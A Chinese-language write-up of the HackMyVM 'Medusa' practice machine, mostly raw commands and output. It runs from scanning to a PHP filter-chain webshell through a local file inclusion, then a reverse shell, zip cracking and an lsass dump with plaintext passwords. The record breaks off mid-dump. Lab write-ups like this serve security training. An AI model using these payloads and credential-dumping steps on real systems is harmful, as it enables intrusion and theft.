HakcMyVM-Medusa

信息搜集

主机发现

复制代码
┌──(kali㉿kali)-[~]
└─$ nmap -sn 192.168.21.0/24
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-22 10:21 EDT
Nmap scan report for 192.168.21.1
Host is up (0.0018s latency).
MAC Address: CC:E0:DA:EB:34:A2 (Baidu Online Network Technology (Beijing))
Nmap scan report for 192.168.21.2
Host is up (0.053s latency).
MAC Address: C2:AB:39:9E:98:94 (Unknown)
Nmap scan report for 192.168.21.3
Host is up (0.00024s latency).
MAC Address: 04:6C:59:BD:33:50 (Intel Corporate)
Nmap scan report for 192.168.21.6
Host is up (0.00051s latency).
MAC Address: 08:00:27:C8:B5:16 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.21.10
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.73 seconds

端口扫描

复制代码
┌──(kali㉿kali)-[~]
└─$ nmap --min-rate 10000 -p- 192.168.21.6 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-22 10:21 EDT
Nmap scan report for 192.168.21.6
Host is up (0.000066s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:C8:B5:16 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.69 seconds
                                                                
┌──(kali㉿kali)-[~]
└─$ nmap -sT -sV -O -p21,22,80 192.168.21.6
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-22 10:22 EDT
Nmap scan report for 192.168.21.6
Host is up (0.00034s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.54 ((Debian))
MAC Address: 08:00:27:C8:B5:16 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.75 seconds

漏洞利用

看一下80端口

目录扫描

复制代码
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.21.6 -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,txt,php,jpg,png,zip,git
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.21.6
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              jpg,png,zip,git,html,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 10674]
/.html                (Status: 403) [Size: 277]
/manual               (Status: 301) [Size: 313] [--> http://192.168.21.6/manual/]                                               
/.html                (Status: 403) [Size: 277]
/.php                 (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]
/hades                (Status: 301) [Size: 312] [--> http://192.168.21.6/hades/]                                                
/logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 277]
Progress: 9482032 / 9482040 (100.00%)
===============================================================
Finished
===============================================================

更深的目录扫描

复制代码
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.21.6/hades -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,txt,php,jpg,png,zip,git
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.21.6/hades
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              png,zip,git,html,txt,php,jpg
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 277]
/.php                 (Status: 403) [Size: 277]
/index.php            (Status: 200) [Size: 0]
/door.php             (Status: 200) [Size: 555]
/.php                 (Status: 403) [Size: 277]
/.html                (Status: 403) [Size: 277]
/logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 277]
Progress: 9482032 / 9482040 (100.00%)
===============================================================
Finished
===============================================================

/hades/door.php

尝试看一下有什么

复制代码
┌──(kali㉿kali)-[~]
└─$ curl http://192.168.21.6/hades/door.php -X POST
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="styles.css">
    
    <title>Door</title>
</head>
<body>
 <form action="d00r_validation.php" method="POST">
    <label for="word">Please enter the magic word...</label>
    <input id="word" type="text" required maxlength="6" name="word">
    <input type="submit" value="submit">
 </form>
</body>
</html>

尝试模糊测试没有出来结果

复制代码
┌──(kali㉿kali)-[~]
└─$ ffuf -u "http://192.168.21.6/hades/door.php" -X POST -d "word=FUZZ" -w /usr/share/wordlists/rockyou.txt -fc 403 -c -fs 0,555 -s

在页面发现有这么一句话

尝试一下

复制代码
┌──(kali㉿kali)-[~]
└─$ curl http://192.168.21.6/hades/door.php -X POST -d "word=Kraken"
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="styles.css">
    
    <title>Door</title>
</head>
<body>
 <form action="d00r_validation.php" method="POST">
    <label for="word">Please enter the magic word...</label>
    <input id="word" type="text" required maxlength="6" name="word">
    <input type="submit" value="submit">
 </form>
</body>
</html>
                                                                
┌──(kali㉿kali)-[~]
└─$ curl http://192.168.21.6/hades/d00r_validation.php -X POST -d "word=Kraken"
<head>
    <link rel="stylesheet" href="styles.css">
    <title>Validation</title>
</head>
<source><marquee>medusa.hmv</marquee></source>

尝试一下dns解析

复制代码
192.168.21.6    medusa.hmv

访问没啥变化,尝试模糊测试

复制代码
┌──(kali㉿kali)-[~]
└─$ ffuf -u "http://medusa.hmv" -H "Host: FUZZ.medusa.hmv" -w SecLists/Discovery/DNS/subdomains-top1million-110000.txt -fc 403 -c -fs 0,10674 -s 
dev

添加一下

复制代码
192.168.21.6    dev.medusa.hmv

目录扫描

复制代码
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://dev.medusa.hmv -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,txt,jpg,png,zip,git
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://dev.medusa.hmv
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,txt,jpg,png,zip,git
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 1973]
/.html                (Status: 403) [Size: 279]
/files                (Status: 301) [Size: 316] [--> http://dev.medusa.hmv/files/]                                              
/assets               (Status: 301) [Size: 317] [--> http://dev.medusa.hmv/assets/]                                             
/css                  (Status: 301) [Size: 314] [--> http://dev.medusa.hmv/css/]                                                
/manual               (Status: 301) [Size: 317] [--> http://dev.medusa.hmv/manual/]                                             
/robots.txt           (Status: 200) [Size: 489]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
/logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 279]
Progress: 9482032 / 9482040 (100.00%)
===============================================================
Finished
===============================================================
┌──(kali㉿kali)-[~]
└─$ curl http://dev.medusa.hmv/files/readme.txt
-----------------------------------------------
+  Don't trust your eyes, trust your instinct +
-----------------------------------------------
                                                                
┌──(kali㉿kali)-[~]
└─$ curl http://dev.medusa.hmv/files//system.php

模糊测试

复制代码
┌──(kali㉿kali)-[~]
└─$ ffuf -u http://dev.medusa.hmv/files/system.php?FUZZ=/etc/passwd -w  SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -fc 403 -c -fs 0 -s
view

查看一下system.php源码

复制代码
┌──(kali㉿kali)-[~]
└─$ curl http://dev.medusa.hmv/files/system.php?view=php://filter/convert.base64-encode/resource=system.php
PD9waHAKCiRmaWxlID0gJF9HRVRbJ3ZpZXcnXTsKaWYoaXNzZXQoJGZpbGUpKQoKewoKaW5jbHVkZSgiJGZpbGUiKTsKCn0KCmVsc2UKCnsKCmluY2x1ZGUoImluZGV4LnBocCIpOwoKfQo/Pgo=
<?php

$file = $_GET['view'];
if(isset($file))

{

include("$file");

}

else

{

include("index.php");

}
?>

使用一下php_filter_chain_generator.py(https://github.com/synacktiv/php_filter_chain_generator)

复制代码
┌──(kali㉿kali)-[~]
└─$ python php_filter_chain_generator.py --chain '<?php system($_GET[1]);?>'
[+] The following gadget chain will generate the following code : <?php system($_GET[1]);?> (base64 value: PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

反弹一个shell

复制代码
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.21.10] from (UNKNOWN) [192.168.21.6] 37906
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

权限提升

看一下都有什么

复制代码
www-data@medusa:/var/www/dev/files$ sudo -l
sudo -l
sudo: unable to resolve host medusa: Name or service not known

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for www-data: 

Sorry, try again.
www-data@medusa:/var/www/dev/files$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/mount
/usr/bin/su
www-data@medusa:/var/www/dev/files$ cat /etc/passwd | grep /bin/bash
cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
spectre:x:1000:1000:spectre,,,:/home/spectre:/bin/bash
www-data@medusa:/home/spectre$ cd /
cd /
www-data@medusa:/$ ls -la
ls -la
total 72
drwxr-xr-x  19 root root  4096 Jan 15  2023 .
drwxr-xr-x  19 root root  4096 Jan 15  2023 ..
drwxr-xr-x   2 root root  4096 Jan 18  2023 ...
lrwxrwxrwx   1 root root     7 Jan 15  2023 bin -> usr/bin
drwxr-xr-x   3 root root  4096 Jan 15  2023 boot
drwxr-xr-x  17 root root  3140 Jul 22 10:20 dev
drwxr-xr-x  71 root root  4096 Jul 22 10:21 etc
drwxr-xr-x   3 root root  4096 Jan 15  2023 home
lrwxrwxrwx   1 root root    31 Jan 15  2023 initrd.img -> boot/initrd.img-5.10.0-20-amd64
lrwxrwxrwx   1 root root    31 Jan 15  2023 initrd.img.old -> boot/initrd.img-5.10.0-18-amd64
lrwxrwxrwx   1 root root     7 Jan 15  2023 lib -> usr/lib
lrwxrwxrwx   1 root root     9 Jan 15  2023 lib32 -> usr/lib32
lrwxrwxrwx   1 root root     9 Jan 15  2023 lib64 -> usr/lib64
lrwxrwxrwx   1 root root    10 Jan 15  2023 libx32 -> usr/libx32
drwx------   2 root root 16384 Jan 15  2023 lost+found
drwxr-xr-x   3 root root  4096 Jan 15  2023 media
drwxr-xr-x   2 root root  4096 Jan 15  2023 mnt
drwxr-xr-x   2 root root  4096 Jan 15  2023 opt
dr-xr-xr-x 146 root root     0 Jul 22 10:20 proc
drwx------   3 root root  4096 Jan 30  2023 root
drwxr-xr-x  19 root root   540 Jul 22 10:21 run
lrwxrwxrwx   1 root root     8 Jan 15  2023 sbin -> usr/sbin
drwxr-xr-x   3 root root  4096 Jan 15  2023 srv
dr-xr-xr-x  13 root root     0 Jul 22 10:20 sys
drwxrwxrwt   2 root root  4096 Jul 22 10:20 tmp
drwxr-xr-x  14 root root  4096 Jan 15  2023 usr
drwxr-xr-x  12 root root  4096 Jan 15  2023 var
lrwxrwxrwx   1 root root    28 Jan 15  2023 vmlinuz -> boot/vmlinuz-5.10.0-20-amd64
lrwxrwxrwx   1 root root    28 Jan 15  2023 vmlinuz.old -> boot/vmlinuz-5.10.0-18-amd64
www-data@medusa:/$ cd ...
cd ...
www-data@medusa:/...$ ls -la
ls -la
total 12108
drwxr-xr-x  2 root     root         4096 Jan 18  2023 .
drwxr-xr-x 19 root     root         4096 Jan 15  2023 ..
-rw-------  1 www-data www-data 12387024 Jan 18  2023 old_files.zip

找到了一个压缩包,传过来破解一下

复制代码
┌──(kali㉿kali)-[~]
└─$ zip2john old_files.zip > hash
                                                                
┌──(kali㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 AVX 4x])
Cost 1 (HMAC size) is 12386830 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
medusa666        (old_files.zip/lsass.DMP)     
1g 0:00:01:25 DONE (2025-07-22 13:30) 0.01164g/s 65936p/s 65936c/s 65936C/s megan0308..medabe15
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

使用pypykatz查看一下DMP文件

复制代码
┌──(kali㉿kali)-[~]
└─$ pypykatz lsa minidump lsass.DMP 
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 2261421 (2281ad)
session_id 18
username avijneyam
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T14:05:20.008398+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1016
luid 2261421
 == MSV ==
  Username: avijneyam
  Domain: Medusa-PC
  LM: 009c022933c34479477921681300160c
  NT: af71862c10235568287670ca23484fe5
  SHA1: 3c9943f1b81e5cdab6cd00d694f8ddd19a079893
  DPAPI: NA
 == WDIGEST [2281ad]==
  username avijneyam
  domainname Medusa-PC
  password 4v1jn3y4m_zxc
  password (hex)3400760031006a006e003300790034006d005f007a0078006300000000000000
 == Kerberos ==
  Username: avijneyam
  Domain: Medusa-PC
  Password: 4v1jn3y4m_zxc
  password (hex)3400760031006a006e003300790034006d005f007a0078006300000000000000
 == WDIGEST [2281ad]==
  username avijneyam
  domainname Medusa-PC
  password 4v1jn3y4m_zxc
  password (hex)3400760031006a006e003300790034006d005f007a0078006300000000000000
 == TSPKG [2281ad]==
  username avijneyam
  domainname Medusa-PC
  password 4v1jn3y4m_zxc
  password (hex)3400760031006a006e003300790034006d005f007a0078006300000000000000

== LogonSession ==
authentication_id 2167111 (211147)
session_id 17
username shelldredd
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T14:04:31.112890+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1009
luid 2167111
 == MSV ==
  Username: shelldredd
  Domain: Medusa-PC
  LM: eed81a9f101536a4abb659e51581b7d4
  NT: 4a88b7b647b8832ddd0660ec101c7471
  SHA1: e2b9a8a7a676bad2060ee2b57cd497ae11d599f9
  DPAPI: NA
 == WDIGEST [211147]==
  username shelldredd
  domainname Medusa-PC
  password t0p_s3cr3t
  password (hex)7400300070005f0073003300630072003300740000000000
 == Kerberos ==
  Username: shelldredd
  Domain: Medusa-PC
  Password: t0p_s3cr3t
  password (hex)7400300070005f0073003300630072003300740000000000
 == WDIGEST [211147]==
  username shelldredd
  domainname Medusa-PC
  password t0p_s3cr3t
  password (hex)7400300070005f0073003300630072003300740000000000
 == TSPKG [211147]==
  username shelldredd
  domainname Medusa-PC
  password t0p_s3cr3t
  password (hex)7400300070005f0073003300630072003300740000000000

== LogonSession ==
authentication_id 2072766 (1fa0be)
session_id 16
username powerful
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T14:04:05.978125+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1012
luid 2072766
 == MSV ==
  Username: powerful
  Domain: Medusa-PC
  LM: 8657a86693ce10c313cb02d141696a00
  NT: 9b05a607cfb0b59176092be732b6b814
  SHA1: f2197be95bf11a3dc2f494b1a20814a3a27bd420
  DPAPI: NA
 == WDIGEST [1fa0be]==
  username powerful
  domainname Medusa-PC
  password p0w3rf1ll_abc
  password (hex)70003000770033007200660031006c006c005f00610062006300000000000000
 == Kerberos ==
  Username: powerful
  Domain: Medusa-PC
  Password: p0w3rf1ll_abc
  password (hex)70003000770033007200660031006c006c005f00610062006300000000000000
 == WDIGEST [1fa0be]==
  username powerful
  domainname Medusa-PC
  password p0w3rf1ll_abc
  password (hex)70003000770033007200660031006c006c005f00610062006300000000000000
 == TSPKG [1fa0be]==
  username powerful
  domainname Medusa-PC
  password p0w3rf1ll_abc
  password (hex)70003000770033007200660031006c006c005f00610062006300000000000000

== LogonSession ==
authentication_id 1977311 (1e2bdf)
session_id 15
username alienum
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T14:03:15.227148+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1018
luid 1977311
 == MSV ==
  Username: alienum
  Domain: Medusa-PC
  LM: ca68f3f2af89ee409b93859eb9628cfa
  NT: f430978744f1846424852b47c4ee8a10
  SHA1: 4c8c55d87f86d95146afd0fe1437d1d71384a15f
  DPAPI: NA
 == WDIGEST [1e2bdf]==
  username alienum
  domainname Medusa-PC
  password 4l13num_qwerty
  password (hex)34006c00310033006e0075006d005f0071007700650072007400790000000000
 == Kerberos ==
  Username: alienum
  Domain: Medusa-PC
  Password: 4l13num_qwerty
  password (hex)34006c00310033006e0075006d005f0071007700650072007400790000000000
 == WDIGEST [1e2bdf]==
  username alienum
  domainname Medusa-PC
  password 4l13num_qwerty
  password (hex)34006c00310033006e0075006d005f0071007700650072007400790000000000
 == TSPKG [1e2bdf]==
  username alienum
  domainname Medusa-PC
  password 4l13num_qwerty
  password (hex)34006c00310033006e0075006d005f0071007700650072007400790000000000

== LogonSession ==
authentication_id 1881308 (1cb4dc)
session_id 14
username Claor
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T14:02:32.235938+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1006
luid 1881308
 == MSV ==
  Username: Claor
  Domain: Medusa-PC
  LM: NA
  NT: 7f62b734f90db005c14454d0e7982bf2
  SHA1: 70cb75925c8a0b5825faaa344e9252ba9c23fa41
  DPAPI: NA
 == WDIGEST [1cb4dc]==
  username Claor
  domainname Medusa-PC
  password n0s_v0lv1m0s_4_1lusi0n4r
  password (hex)6e00300073005f00760030006c00760031006d00300073005f0034005f0031006c0075007300690030006e0034007200
 == Kerberos ==
  Username: Claor
  Domain: Medusa-PC
  Password: n0s_v0lv1m0s_4_1lusi0n4r
  password (hex)6e00300073005f00760030006c00760031006d00300073005f0034005f0031006c0075007300690030006e0034007200
 == WDIGEST [1cb4dc]==
  username Claor
  domainname Medusa-PC
  password n0s_v0lv1m0s_4_1lusi0n4r
  password (hex)6e00300073005f00760030006c00760031006d00300073005f0034005f0031006c0075007300690030006e0034007200
 == TSPKG [1cb4dc]==
  username Claor
  domainname Medusa-PC
  password n0s_v0lv1m0s_4_1lusi0n4r
  password (hex)6e00300073005f00760030006c00760031006d00300073005f0034005f0031006c0075007300690030006e0034007200

== LogonSession ==
authentication_id 1785900 (1b402c)
session_id 13
username Pr0xy
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T14:01:16.137305+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1017
luid 1785900
 == MSV ==
  Username: Pr0xy
  Domain: Medusa-PC
  LM: NA
  NT: ba26a9d6f4cf057e1652257963729d49
  SHA1: 802991035ea1acf65584c004f34a72902a0e609c
  DPAPI: NA
 == WDIGEST [1b402c]==
  username Pr0xy
  domainname Medusa-PC
  password pr0xy_ch41ns_456
  password (hex)700072003000780079005f0063006800340031006e0073005f00340035003600
 == Kerberos ==
  Username: Pr0xy
  Domain: Medusa-PC
  Password: pr0xy_ch41ns_456
  password (hex)700072003000780079005f0063006800340031006e0073005f00340035003600
 == WDIGEST [1b402c]==
  username Pr0xy
  domainname Medusa-PC
  password pr0xy_ch41ns_456
  password (hex)700072003000780079005f0063006800340031006e0073005f00340035003600
 == TSPKG [1b402c]==
  username Pr0xy
  domainname Medusa-PC
  password pr0xy_ch41ns_456
  password (hex)700072003000780079005f0063006800340031006e0073005f00340035003600

== LogonSession ==
authentication_id 1692880 (19d4d0)
session_id 12
username nolo
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T14:00:28.298438+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1019
luid 1692880
 == MSV ==
  Username: nolo
  Domain: Medusa-PC
  LM: 580bb7781b7384e43463667f1a71e97a
  NT: d54fc8d1a368eab7bee473b8c7b93748
  SHA1: 50908cf3b351621d70f7e55e9ca92c37b0a5990d
  DPAPI: NA
 == WDIGEST [19d4d0]==
  username nolo
  domainname Medusa-PC
  password littl3_h4ck3r
  password (hex)6c006900740074006c0033005f006800340063006b0033007200000000000000
 == Kerberos ==
  Username: nolo
  Domain: Medusa-PC
  Password: littl3_h4ck3r
  password (hex)6c006900740074006c0033005f006800340063006b0033007200000000000000
 == WDIGEST [19d4d0]==
  username nolo
  domainname Medusa-PC
  password littl3_h4ck3r
  password (hex)6c006900740074006c0033005f006800340063006b0033007200000000000000
 == TSPKG [19d4d0]==
  username nolo
  domainname Medusa-PC
  password littl3_h4ck3r
  password (hex)6c006900740074006c0033005f006800340063006b0033007200000000000000

== LogonSession ==
authentication_id 1381468 (15145c)
session_id 11
username numero6
domainname Medusa-PC
